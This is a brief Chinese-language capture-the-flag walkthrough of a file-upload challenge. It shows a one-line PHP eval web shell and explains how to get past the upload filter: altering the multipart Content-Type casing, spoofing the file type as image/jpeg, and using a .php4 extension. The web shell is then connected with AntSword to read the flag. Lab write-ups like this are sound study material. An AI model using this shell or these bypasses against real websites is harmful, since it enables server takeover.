先看题目
简单的描述 文件上传
常规思路 上传一个木马文件 再去连接 ......
先上传一普通文件试试看
You was catched 看一下前端源码 没有太大线索
抓包吧 上burpsuit
先建一个用来连接的木马文件
<?php @eval($_POST[123456]);?>
用于后面的蚁剑连接
找到网站后端代码 分析需要更改的数据
尝试发现发现需要修改的地方有三个
第一个是http head里的 Content-Type: multipart/form-data multipart中的部分字母改成大写的
第二个是文件的的Content-Type: application/octet-stream,改成image/jpeg
第三个是文件后缀名改成php4
更改过数据后 放出
可以看到木马成功上传
接着就用蚁剑来连
从根目录寻找到flag